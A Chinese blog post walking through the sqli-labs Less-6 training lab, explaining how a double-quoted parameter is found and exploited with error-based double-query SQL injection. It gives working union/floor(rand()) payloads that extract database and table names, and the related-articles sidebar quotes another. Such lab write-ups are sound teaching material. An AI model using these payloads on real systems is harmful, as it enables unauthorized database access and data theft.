sql-labs练习(六)-----GET-Double injection-Double Quotes-String

最新推荐文章于 2022-11-02 16:09:13 发布
最新推荐文章于 2022-11-02 16:09:13 发布
阅读量405 收藏 1
点赞数
分类专栏: sql注入 文章标签: sqli-labs练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/80025221
版权

这里写图片描述

输入参数id的值1
这里写图片描述
输入1'
这里写图片描述
通过以上测试结果可以推断出,sql查询语句中使用到了双引号"",因为参数1'有回显You are in...........

再次测试,输入1",注意这里是双引号,不是两个单引号,出现报错信息
这里写图片描述

现在,可以推断出的就是,回显只有两种情况,
1.You are in...........
2.报错信息

注意看报错信息or the right syntax to use near '"1"" LIMIT 0,1' at line 1
发现报错的原因是我们输入的参数中将左边的双引号闭合了,导致sql语句中原来的右边的双引号没有闭合,OK,知道了问题的根源,那么我们就来构造sql语句,这里我们可以将sql查询语句源码中的双引号注释掉,构造以下语句
1"%23
可以看到,语句正常通过,没有报错
这里写图片描述

那么接下来就是老套路了,利用我们神奇的union关键字,获取我们想要的信息

获取当前数据库名0" union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a%23
这里写图片描述

获取数据库security中的表名
0" union select count(*),2,concat('/',(select group_concat(table_name) from information_schema.tables where table_schema='security'),'/',floor(rand()*2))as a from information_schema.tables group by a%23
这里写图片描述

wkend
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
Sqli-Labs靶场(6--10)题详解
weixin_46099095的博客
03-11 2152
、Less-6:GET - Double Injection - Double Quotes - string(GET - 双重注入 - 双引号 - 字符串) 此题解法与Less-5类似 只需判断注入点时使用?id=1"-- + 附上Less1-Less5题解 https://blog.csdn.net/weixin_46099095/article/details/123399846?spm=1001.2014.3001.5502 七、Less-7:GET - Dump into outfil
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符型注入)
sm1918451478的博客
11-02 210
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符型注入)
MysqlDouble Injection原理浅析
若水斋
04-14 3492
SQL注入中有时会遇到这样的情况:若SQL语句正确,则页面正常返回,但返回的页面中不包含任何有用的信息,而当SQL语句错误时,页面会显示SQL错误信息。在这种情况下,可以使用Double Injection技术从数据库中读取有用的信息,因为在Double Injection中是将有用的信息写在SQL错误信息中的。这篇文章简要的分析了在MysqlDouble Injection的原理。
目前遇到的各种报错信息汇总
浦东余春娇
09-22 6510
SyntaxError: JSON.parse: expected double-quoted property name at line 1 column 25 of the JSON data JSON转对象时,字符某位置的key未加双引号 TypeError: obj is not iterable 在for-of的使用中,obj是不可迭代的,禁止使用 Uncaught RangeError...
操作json报错:json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes
qq_41571224的博客
04-08 1724
操作json报错:json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes:line 2 column 1 (char 2) 这个问题是json数据文件的格式所导致的,建议json文件中的数据都使用双引号,不要使用单引号。 下面这个格式不会报错: {"login":{"username":"use...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs实验指导手册
最新发布
11-17
sqli-labs实验指导手册,通过搭建sqli-labs实验平台,对每一道题进行通关操作的讲解,帮助同学们学习和操作以及理解Sql注入的原理
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入)
sm1918451478的博客
10-31 405
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入)
sqli-lab教程——Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
luosaierdadi的博客
07-08 86
双引号字符型注入,上一题的单引号改成双引号就可以了,同样是两种方法:时间延迟型的手工盲注、报错型的手工盲注或者sqlmap,再有利用concat()几聚合数。步骤和第五题一样。
sqli-labs练习(五)------GET-Double injection-Single Quotes-String
wkend的博客
04-17 886
按提示,输入id参数1,得到回馈结果,但是没用 输入1',报错 查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错, 通过以上过程可以发现,当我们改变参数的时候,回显只有两种结果 1>You are in........... 2> 报错信息 没办法,正确的查询只返回第一种情况,那么只能靠第二种回显结果了,...
关于双查询(double injection)的思考
Warrior_L6的博客
06-08 949
问题一:什么是双查询? 之前理解成了二次注入,其实不是,自己也是个憨憨! 二次查询指是在一条查询语句当中包含一条select语句,而这条语句则是我们最终要使用的语句,外边的是一种包装,暂时就先这么理解 问题二:双查询的格式? Select 1,(select database()); 进入正题(以sqli-labs为例) 0x01什么条件下使用double injectin 输入参数正确的时候页面显示正确对应的结果(less-13) 输入错误对应的页面: 没有任何的回显信息!但
sql-lab注入分析
goddemon
07-22 476
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 导致错误:get注入单引号未过滤 List item 判断是否有注入点 输入 ’ 进行判断发现返回的错误类型,即可直接确认有注入点(如果这里返回的值无法确认的话,需 要继续利用and 1=1 and 1=2代判断) 在这里,也可利用引号的数目确认是字符型还是数字类型(因为返回的是’’-1’’,说明是字符类型) 判断字符类 注意这里用–+表示的注释 (典型三类注释 – -
sqli-labs】 less6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)...
ajxi63204的博客
01-19 138
同less5 单引号改成双引号就行 http://localhost/sqli/Less-6/?id=a" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9)...
Sqlilabs Less 5-6 Double Injection
baynk的博客
02-22 592
Less 5 GET - Double Injection - Single Quotes - String 手工注入 传参后,发现没出现用户名和密码,出现的是You are in...........,奇了怪,先不管了,加个'试试,出现错误回显,near ''1'' LIMIT 0,1' at line 1,这个和之前出现的是一样,单引号闭合,属于字符型注入。 但是发现,即使构造sql语句也没...
数据库中rs.getDouble值不为null,而为0.0
meishigaishaming
05-08 4932
今天在查询数据库的时候,数据库表字段为Doube,默认值为0。没给这个字段赋值,但是在查询的时候,rs.getDouble得到的model中,这个字段的值却为0.0,后来看了一下,原来是rs.getDouble的问题,这个方法的返回值是基本类型double,所以会出现这种情况。同样情况的还有rs.getInt;rs.getLong等。 我的解决办法是: Object ratio = r
rs.getString VS rs.getDouble
quietsummer的专栏
07-29 2910
前几天在做一个struts的项目我写了这样一句:form.setA(String.valueOf((rs.getDouble("a")));form为ActionForm对象,a为它的一个String类型的属性,同时一张表的real类型字段名为a 一个同事问我为什么不用form.setA(rs.getString("a"));我当时也想,是啊,为什么不这样写呢,简洁一些 后来发现有问题,比如我存入
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值